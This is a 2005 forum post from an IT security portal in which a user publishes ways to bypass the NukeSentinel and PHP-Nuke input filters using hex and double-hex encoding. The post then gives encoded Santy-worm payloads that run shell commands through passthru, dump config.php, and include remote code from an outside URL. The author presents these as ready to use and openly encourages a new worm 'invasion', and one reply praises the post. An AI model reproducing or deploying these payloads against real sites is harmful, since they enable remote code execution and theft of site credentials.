Waraxe IT Security Portal
Login or Register
October 21, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 500
Members: 0
Total: 500
Full disclosure
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> NukeSentinel and PHP-Nuke security filters bypass
Post new topicReply to topic View previous topic :: View next topic
NukeSentinel and PHP-Nuke security filters bypass
PostPosted: Sun May 08, 2005 6:08 pm Reply with quote
FistFucker
Regular user
Regular user
Joined: May 06, 2005
Posts: 21




I couldn't send it to Full-Disclosure or Bugtraq. So I release it here. Have fun!

Code:

Title: NukeSentinel and PHP-Nuke security filters bypass
Author: FistFucker
Contact: FistFuXXer@gmx.de
Date: May 08, 2005


1. NukeSentinel security filters bypass:
===========================================

The "Santy worm protection" in NukeSentinel can be bypassed by using hex
encoded characters in GET requests. It's also possible to bypass other
filters, like the "SQL injection filter" by the same way. I've not
tested higher versions than 2.1.4 (2.2.1 is out), but feel free to try it
out with newer ones!

Will be filtered:
'modules.php?highlight=FistFucker'

Will be bypassed:
'modules.php?hi%67hlight=FistFucker'


Will be filtered:
'/**/UNION/**/SELECT/**/'

Will be bypassed:
'/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/'


Successfully tested against:

- NukeSentinel 2.1.3
- NukeSentinel 2.1.4


2. PHP-Nuke security filters bypass:
=======================================

PHP-Nuke filters some dangerous characters, like '(' followed by ')' in
GET requests. This can easily be bypassed with double hex encoded
characters. It should also work on many (or all?) PHP-Nuke based content
management systems, too.

Will be filtered:
'modules.php?FistFucker=()'

Will be bypassed:
'modules.php?FistFucker=%2528%2529'


Successfully tested against:

- PHP-Nuke <= 7.7
- PHPNUKE-CLAN <= 2.1.0


3. Let's start a new Santy invasion:
=======================================

Now, with this knowledge, we can inject the famous "Santy worm exploit"
into a PHP-Nuke and other content management systems with a module based
on phpBB <= 2.0.11! Note: it appends ')\b#i' to our string, so we must
use include URLs like: 'http://waraxe.us/?' and not 'http://waraxe.us/'.

Append it after: 'modules.php?&name=Forums&file=viewtopic&t=1'

Local command execution:
'&FistFucker=ls&%68%69%67%68%6C%69%67%68%74=%2527%252Epassthru%2528%24%48
%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%46%69%73%74%46%75%63%6B%65%72%5D
%2529%252E%2527'

Local file output (config.php):
'&FistFucker=config.php&%68%69%67%68%6C%69%67%68%74=%2527%252Ereadfile
%2528%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%46%69%73%74%46%75%63
%6B%65%72%5D%2529%252E%2527'

Remote code execution:
'&FistFucker=http://www.waraxe.us/%3F&%68%69%67%68%6C%69%67%68%74=%2527
%252Einclude_once%2528%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%46%69
%73%74%46%75%63%6B%65%72%5D%2529%252E%2527'


Successfully tested against:

- phpBB 2.10 port
- phpBB 2.10 port (with NukeSentinel 2.1.3)
- phpBB 2.10 port (with NukeSentinel 2.1.4)
- phpBB component v1.2.4 RC1
- PNphpBB2 1.2d


4. Private stuff:
====================

OfB-Clan are damn liers, don't trust them and don't support such people!
If you want some proofs of my innocence, contact me! Divine is sweet! :P

View user's profile Send private message
PostPosted: Thu May 12, 2005 9:14 am Reply with quote
Ayurvedi
Beginner
Beginner
Joined: Mar 20, 2005
Posts: 3




Simply Great! Smile
View user's profile Send private message
NukeSentinel and PHP-Nuke security filters bypass
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds